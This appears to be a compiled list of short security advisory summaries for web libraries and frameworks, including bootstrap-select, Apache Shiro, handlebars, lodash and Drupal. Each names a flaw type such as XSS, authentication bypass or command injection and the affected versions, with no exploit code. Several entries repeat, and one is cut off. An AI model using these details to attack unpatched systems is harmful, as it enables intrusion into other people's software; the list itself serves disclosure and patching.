bootstrap-select allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.
A websocket peer may exhaust memory on Eventlet side by sending very large websocket frames. Malicious peer may exhaust memory on Eventlet side by sending highly compressed data frame.
Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
Craft CMS has an XSS vulnerability.
Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.
In Strapi, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password.
Unsafe validation RegEx in EmailValidator allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.
Impact The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. Patches The vulnerability has been patched of the master branch of the series, of the stable branch. The Docker image on docker.io has been patched. Workarounds If upgrading is not possible, manually apply the changes of https://github.com/jhpyle/docassemble/commit/e3dbf6ce054b3c0310996f0657289f5eed0a73fe and restart the server (e.g., by pressing Save on the Configuration screen). Credit The vulnerability was …
The svglib package through 0.9.3 for Python allows XXE attacks via an svg2rlg call.
An SSRF issue in Open Distro for Elasticsearch (ODFE) allows an existing privileged user to enumerate listening services or interact with configured resources via HTTP requests exceeding the Alerting plugin's intended scope.
Bolt before 3.7.2 does not restrict filter options in a Request in the Twig context, and is therefore inconsistent with the "How to Harden Your PHP for Better Security" guidance.
Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds. https://vaadin.com/security/cve-2021-31411
Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds.
The "gitDiff" function in Wayfair git-parse has a command injection vulnerability. Clients of the git-parse library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
An issue was discovered in Laravel before 6.18.35 and 7.x before 7.24.0. The $guarded property is mishandled in some situations involving requests with JSON column nesting expressions.
All versions of phpjs are vulnerable to Prototype Pollution via parse_str.
The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function.
Lodash versions prior to 4.17.21 is vulnerable to Command Injection via the template function.
Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System < 6.5.1 allows remote attackers to execute arbitrary web script via embedding javascript or HTML tags in a GET request.
In Ruby on Windows, a remote attacker can submit a crafted path when a Web application handles a parameter with TmpDir.
Mixme is a library for recursive merging of Javascript objects. In Node.js mixme, an attacker can add or alter properties of an object via proto through the mutate() and merge() functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service (DoS).
An issue was discovered in Flask-CORS (aka CORS Middleware for Flask) before 3.0.9. It allows ../ directory traversal to access private resources because resource matching does not ensure that pathnames are in a canonical format.
Multiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allows remote attackers to perform unauthorized actions as administrator to (1) approve the mass of the user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor api, (6) uploading things to the media library, (7) exporting locale.
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
This affects the package Gerapy from 0 and before 0.9.3. The input being passed to Popen, via the project_configure endpoint, isn’t being sanitized.
Open Redirect vulnerability in Drupal Core allows a user to be tricked into visiting a specially crafted link which would redirect them to an arbitrary external URL. This issue affects: Drupal Drupal Core 7 and prior versions.